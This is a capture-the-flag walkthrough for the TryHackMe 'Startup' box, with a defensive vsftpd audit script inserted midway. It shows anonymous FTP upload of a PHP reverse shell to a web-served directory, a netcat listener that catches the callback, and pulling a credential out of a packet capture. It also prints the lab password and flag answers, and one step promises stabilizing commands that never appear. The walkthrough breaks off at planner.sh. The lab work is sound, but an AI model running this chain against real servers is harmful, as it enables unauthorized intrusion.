$ ftp anonymous@10.10.96.227
Connected to 10.10.96.227.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Note that the password for anonymous login is anonymous.
Let's look around a bit.
ftp> ls
229 Entering Extended Passive Mode (|||62019|)
150 Here comes the directory listing.
drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp
-rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
226 Directory send OK.
ftp> cd ftp
250 Directory successfully changed.
We can upload a reverse shell to this directory.
We will use the /usr/share/webshells/php/php-reverse-shell.php script after making two modifications: we replaced the IP address with our tun0 address and set the port to a port of our choice.
Let's upload the file to the FTP server using put.
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||50625|)
150 Ok to send data.
100% |***********************************************************************************************************************************************************************************************| 5494 2.27 MiB/s 00:00 ETA
226 Transfer complete.
5494 bytes sent in 00:00 (19.80 KiB/s)
Now we have to listen on port 9999 using netcat.
$ nc -nlvp 9999
listening on [any] 9999 ...
Let's browse to the /files/ftp folder on the web server.
All we have to do now is open the php-reverse-shell.php file so that the web server executes it.
If we go back to our console, we should have a shell.
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.96.227] 37428
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
06:33:05 up 42 min, 0 users, load average: 0.00, 0.00, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
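The weakness that makes this chain work is an anonymous-writable FTP directory that also sits under the web document root. As an added example (not part of the original write-up), the following Python script audits a vsftpd.conf for exactly that combination; both sample configs are constructed, and the /var/www/html/files anon_root is an assumption modelled on the path that appears later on this box.

```python
from typing import Dict, List

# Constructed sample configs for this example (not taken from the target).
WEAK_CONF = """
listen=YES
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_root=/var/www/html/files
"""

HARDENED_CONF = """
listen=YES
anonymous_enable=YES
write_enable=NO
anon_root=/srv/ftp
"""


def parse_vsftpd_conf(text: str) -> Dict[str, str]:
    """Parse vsftpd's flat key=value format; a line starting with '#' is a comment."""
    conf: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip().lower()] = value.strip()
    return conf


def _yes(conf: Dict[str, str], key: str, default: str) -> bool:
    return conf.get(key, default).upper() == "YES"


def audit_vsftpd(conf: Dict[str, str], web_roots=("/var/www/html",)) -> List[str]:
    """Return findings for the anonymous-upload weakness; [] means clean.
    Defaults follow vsftpd.conf(5): anonymous_enable=YES, write_enable=NO,
    anon_upload_enable=NO, anon_mkdir_write_enable=NO."""
    findings: List[str] = []
    anon_can_write = (_yes(conf, "anonymous_enable", "YES")
                      and _yes(conf, "write_enable", "NO")
                      and (_yes(conf, "anon_upload_enable", "NO")
                           or _yes(conf, "anon_mkdir_write_enable", "NO")))
    if anon_can_write:
        findings.append("anonymous users can write to the FTP tree")
        anon_root = conf.get("anon_root", "")  # unset: vsftpd uses the ftp user's home
        for root in web_roots:
            if anon_root == root or anon_root.startswith(root.rstrip("/") + "/"):
                findings.append(f"anon_root {anon_root} is inside web root {root}: "
                                "uploaded scripts are reachable over HTTP")
    return findings


def audit_text(text: str) -> List[str]:
    return audit_vsftpd(parse_vsftpd_conf(text))
```

With the defaults above, an empty config is read-only anonymous access and produces no findings; only the combination of global write_enable and an anonymous upload directive is flagged.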
We can stabilize the shell using the following commands:
www-data@startup:/$ ls
bin home lib mnt root srv vagrant
boot incidents lib64 opt run sys var
dev initrd.img lost+found proc sbin tmp vmlinuz
etc initrd.img.old media recipe.txt snap usr vmlinuz.old
Here, the recipe.txt file seems interesting. We can read it using the cat command.
www-data@startup:/$ cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
Answer
love
Question
What are the contents of user.txt?
We have to go to the /incidents directory.
www-data@startup:/incidents$ ls
suspicious.pcapng
Let's copy the suspicious.pcapng file to the ftp directory.
www-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp/
www-data@startup:/incidents$ ls /var/www/html/files/ftp/
php-reverse-shell.php suspicious.pcapng
Let's look at our FTP session again.
ftp> ls
229 Entering Extended Passive Mode (|||32073|)
150 Here comes the directory listing.
-rwxrwxr-x 1 112 118 5494 Dec 06 06:28 php-reverse-shell.php
-rwxr-xr-x 1 33 33 31224 Dec 06 06:55 suspicious.pcapng
226 Directory send OK.
We can now download this file using the get command.
ftp> get suspicious.pcapng
local: suspicious.pcapng remote: suspicious.pcapng
229 Entering Extended Passive Mode (|||41055|)
150 Opening BINARY mode data connection for suspicious.pcapng (31224 bytes).
100% |***********************************************************************************************************************************************************************************************| 31224 118.42 KiB/s 00:00 ETA
226 Transfer complete.
31224 bytes received in 00:00 (79.21 KiB/s)
We can now use Wireshark to analyze the packet capture.
In frame 45 we can see that the user has entered some commands.
Let's use Follow > TCP Stream to view the whole conversation.
The password for the lennie user is c4ntg3t3n0ughsp1c3.
www-data@startup:/$ su lennie
Password:
lennie@startup:/$
We can now go to /home/lennie and get the flag.
lennie@startup:/$ cd /home/lennie/
lennie@startup:~$ ls
Documents scripts user.txt
lennie@startup:~$ cat user.txt
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
Answer
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
Question
What are the contents of root.txt?
Let's check what's inside the scripts/ directory.
lennie@startup:~$ cd scripts/
lennie@startup:~/scripts$ ls
planner.sh startup_list.txt
We can check what the planner.sh file is doing using cat.